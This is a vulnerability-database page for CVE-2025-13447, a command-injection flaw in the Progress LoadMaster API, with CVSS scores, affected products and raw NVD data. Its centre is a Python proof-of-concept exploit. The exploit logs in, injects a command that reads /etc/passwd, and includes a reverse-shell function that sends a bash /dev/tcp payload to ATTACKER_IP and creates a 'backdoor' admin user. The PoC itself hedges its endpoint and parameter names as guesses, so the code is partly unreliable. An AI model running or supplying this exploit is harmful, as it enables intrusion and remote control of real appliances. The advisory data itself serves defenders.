Security Vulnerability Report
中文
CVE-2025-13447 CVSS 8.4 HIGH

CVE-2025-13447

Published: 2026-01-13 15:15:58
Last Modified: 2026-02-10 18:18:42
Source: [email protected]

Description

OS Command Injection Remote Code Execution Vulnerability in API in Progress LoadMaster allows an authenticated attacker with “User Administration” permissions to execute arbitrary commands on the LoadMaster appliance by exploiting unsanitized input in the API input parameters

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:progress:connection_manager_for_objectscale*:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:progress:ecs_connection_manager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:progress:loadmaster:*:*:*:*:ltsf:*:*:* - VULNERABLE
cpe:2.3:a:progress:loadmaster:*:*:*:*:ga:*:*:* - VULNERABLE
cpe:2.3:a:progress:moveit_waf:7.2.62.1:*:*:*:*:*:*:* - VULNERABLE
Progress LoadMaster < 最新安全补丁版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13447 PoC - Progress LoadMaster API OS Command Injection # Requires authenticated user with "User Administration" permissions import requests import urllib3 import json urllib3.disable_warnings() TARGET = "https://target-loadmaster.example.com" USERNAME = "admin" PASSWORD = "password" def login(): """Authenticate to LoadMaster and get session cookie""" login_url = f"{TARGET}/access/login" data = { "username": USERNAME, "password": PASSWORD } try: response = requests.post(login_url, data=data, verify=False, timeout=10) if response.status_code == 200: return response.cookies except Exception as e: print(f"Login failed: {e}") return None def exploit_os_injection(session_cookies): """Exploit OS command injection in API parameters""" # Target API endpoint - varies based on LoadMaster version api_url = f"{TARGET}/api/v1/user/administration" # Malicious payload - injects OS command to read /etc/passwd # The vulnerable parameter may vary; adjust based on actual endpoint payload = { "username": "testuser", "description": "; cat /etc/passwd #", "role": "user" } try: response = requests.post( api_url, json=payload, cookies=session_cookies, verify=False, timeout=10 ) print(f"Response Status: {response.status_code}") print(f"Response Body: {response.text}") return response except Exception as e: print(f"Exploitation failed: {e}") return None def reverse_shell(session_cookies): """Deploy reverse shell payload""" api_url = f"{TARGET}/api/v1/user/administration" # Reverse shell payload - attacker-controlled values attacker_ip = "ATTACKER_IP" attacker_port = "4444" payload = { "username": "backdoor", "description": f"; bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1 #", "role": "admin" } try: response = requests.post( api_url, json=payload, cookies=session_cookies, verify=False, timeout=10 ) print(f"Reverse shell payload sent") return response except Exception as e: print(f"Failed: {e}") return None if __name__ == "__main__": print("[*] CVE-2025-13447 PoC - LoadMaster OS Command Injection") print("[*] Target:", TARGET) # Step 1: Authenticate print("\n[1] Authenticating...") session = login() if session: print("[+] Login successful") else: print("[-] Authentication failed") exit(1) # Step 2: Exploit command injection print("\n[2] Exploiting OS command injection...") exploit_os_injection(session) # Step 3: Optional - Deploy reverse shell # print("\n[3] Deploying reverse shell...") # reverse_shell(session)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13447", "sourceIdentifier": "[email protected]", "published": "2026-01-13T15:15:58.060", "lastModified": "2026-02-10T18:18:42.417", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OS Command Injection Remote Code Execution Vulnerability in API in Progress LoadMaster allows an authenticated attacker with “User Administration” permissions to execute arbitrary commands on the LoadMaster appliance by exploiting unsanitized input in the API input parameters"}, {"lang": "es", "value": "Vulnerabilidad de inyección de comandos del sistema operativo con ejecución remota de código en la API de Progress LoadMaster permite a un atacante autenticado con permisos de 'Administración de Usuarios' ejecutar comandos arbitrarios en el dispositivo LoadMaster explotando la entrada no saneada en los parámetros de entrada de la API."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.7, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:progress:connection_manager_for_objectscale*:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2.62.2", "matchCriteriaId": "9D8981F2-113F-4870-BFAF-1F92B8262EA9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:progress:ecs_connection_manager:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2.62.2", "matchCriteriaId": "1FC15908-9A59-4CB5-8279-02F3E061AB11"}, {"vulnerable": true, "criteria": "cpe:2.3:a:progress:loadmaster:*:*:*:*:ltsf:*:*:*", "versionEndExcluding": "7.2.54.16", "matchCriteriaId": "CB2D26CD-AF3F-463E-913F-FC41B0F122C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:progress:loadmaster:*:*:*:*:ga:*:*:*", "versionEndExcluding": "7.2.62.2", "matchCriteriaId": "146A0610-9E1C-4614-9327-92D0336A82BE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:progress:moveit_waf:7.2.62.1:*:*:*:*:*:*:*", "matchCriteriaId": "7935C9E7-E371-463E-B9EF-F2F52DCE4315"}, {"vulnerable": true, "criteria": "cpe:2.3:a:progress:multi-tenant_hypervisor:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.1.35.15", "matchCriteriaId": "621720F8-C897-4CB6-BED8-687BB400D5DC"}]}]}], "references": [{"url": "https://community.progress.com/s/article/Connection-Manager-for-ObjectScale-Vulnerabilities-CVE-2025-13444-CVE-2025-13447", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://community.progress.com/s/article/ECS-Connection-Manager-Vulnerabilities-CVE-2025-13444-CVE-2025-13447", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://community.progress.com/s/article/LoadMaster-Vulnerabilities-CVE-2025-13444-CVE-2025-13447", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://community.progress.com/s/article/MOVEit-WAF-Vulnerabilities-CVE-2025-13444-CVE-2025-13447", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.